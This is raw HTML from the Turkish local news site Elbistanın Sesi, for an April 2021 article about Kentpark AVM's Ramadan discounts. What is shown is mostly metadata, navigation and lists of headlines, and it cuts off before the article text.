  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Elbistan&#039;ın en büyük alışveriş merkezlerinden olan Elbistan Kentpark AVM, yaklaşan Ramazan ayını indirimlerle karşılıyor." />
<meta name="keywords" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" />
<meta name="news_keywords" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" />
<meta property="og:description" content="Elbistan&#039;ın en büyük alışveriş merkezlerinden olan Elbistan Kentpark AVM, yaklaşan Ramazan ayını indirimlerle karşılıyor." />
  <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html" />
<meta name="twitter:domain" content="http://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" />
<meta name="twitter:description" content="Elbistan’ın en büyük alışveriş merkezlerinden olan Elbistan Kentpark AVM, yaklaşan Ramazan ayını indirimlerle karşılıyor." />
<meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" /><link rel="alternate" href="http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html">
<link rel="amphtml" href="http://www.elbistaninsesi.com/amp/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html">
  <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" />
<meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-04-08T18:05:03+02:00" />
<meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.1496</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">9.7114</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">459.831</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1417</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/ambulansla-otomobil-carpisti-olu-ve-yaralilar-var-h69783.html" title="Ambulansla otomobil çarpıştı: ölü ve yaralılar var" >Ambulansla otomobil çarpıştı: ölü ve yaralılar var</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/otomobile-motosiklet-carpisti-1-yarali-h69782.html" title="Otomobile motosiklet çarpıştı: 1 yaralı" >Otomobile motosiklet çarpıştı: 1 yaralı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/polis-haftasi-kutlamalari-basladi-2-h69781.html" title="Polis Haftası kutlamaları başladı" >Polis Haftası kutlamaları başladı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-zor-elbistanda-ziyaretlerde-bulundu-h69780.html" title="Başkan Zor, Elbistan’da ziyaretlerde bulundu" >Başkan Zor, Elbistan’da ziyaretlerde bulundu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/19-mahalledeki-63-tasinmaz-9-milyon-tl-toplam-bedelle-satisa-cikarildi-h69779.html" title="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı" >19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/ketem-kanserde-erken-teshisin-onemine-dikkat-cekti-h69778.html" title="KETEM, kanserde erken teşhisin önemine dikkat çekti" >KETEM, kanserde erken teşhisin önemine dikkat çekti</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html" title="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" >Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/akbayir-halkindan-baskan-tirasa-tesekkur-h69776.html" title="Akbayır halkından Başkan Tıraş’a teşekkür" >Akbayır halkından Başkan Tıraş’a teşekkür</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-12-bin-kumes-hayvani-h69775.html" title="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı" >Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-supheli-tutuklandi-h69774.html" title="Uyuşturucu operasyonunda 2 şüpheli tutuklandı" >Uyuşturucu operasyonunda 2 şüpheli tutuklandı</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="eb59b4eba9489d5fad648910f9e52eeecb9b3101" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="http://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/anma-tahsin-seran-h69772.html" title="Anma / Tahsin Şeran"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/anma_tahsin_seran_h69772_27c34.jpg" alt="Anma / Tahsin Şeran" />
Anma / Tahsin Şeran</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-fatma-yazicioglu-h69771.html" title="Vefat - Teşekkür / Fatma Yazıcıoğlu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/anma_fatma_yazicioglu_h69771_c0fca.jpg" alt="Vefat - Teşekkür / Fatma Yazıcıoğlu" />
Vefat - Teşekkür / Fatma Yazıcıoğlu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/anma-jandarma-cavus-mehmet-inan-h69765.html" title="Anma / Jandarma Çavuş Mehmet İnan"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/anma_jandarma_cavus_mehmet_inan_h69765_c6c25.png" alt="Anma / Jandarma Çavuş Mehmet İnan" />
Anma / Jandarma Çavuş Mehmet İnan</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/sultan-yuce-75-yasinda-h69764.html" title="Sultan Yüce 75 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/sultan_yuce_75_yasinda_h69764_fac4b.jpg" alt="Sultan Yüce 75 yaşında" />
Sultan Yüce 75 yaşında</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/ambulansla-otomobil-carpisti-olu-ve-yaralilar-var-h69783.html" title="Ambulansla otomobil çarpıştı: ölü ve yaralılar var"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/ambulansla_otomobil_carpisti_olu_ve_yaralilar_var_h69783_06456.jpg" alt="Ambulansla otomobil çarpıştı: ölü ve yaralılar var" />
Ambulansla otomobil çarpıştı: ölü ve yaralılar var</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/otomobile-motosiklet-carpisti-1-yarali-h69782.html" title="Otomobile motosiklet çarpıştı: 1 yaralı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/otomobile_motosiklet_carpisti_1_yarali_h69782_5e36d.jpg" alt="Otomobile motosiklet çarpıştı: 1 yaralı" />
Otomobile motosiklet çarpıştı: 1 yaralı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/polis-haftasi-kutlamalari-basladi-2-h69781.html" title="Polis Haftası kutlamaları başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/polis_haftasi_kutlamalari_basladi_h69781_241b1.JPG" alt="Polis Haftası kutlamaları başladı" />
Polis Haftası kutlamaları başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/baskan-zor-elbistanda-ziyaretlerde-bulundu-h69780.html" title="Başkan Zor, Elbistan’da ziyaretlerde bulundu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/baskan_zor_elbistanda_ziyaretlerde_bulundu_h69780_553d8.jpg" alt="Başkan Zor, Elbistan’da ziyaretlerde bulundu" />
Başkan Zor, Elbistan’da ziyaretlerde bulundu</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
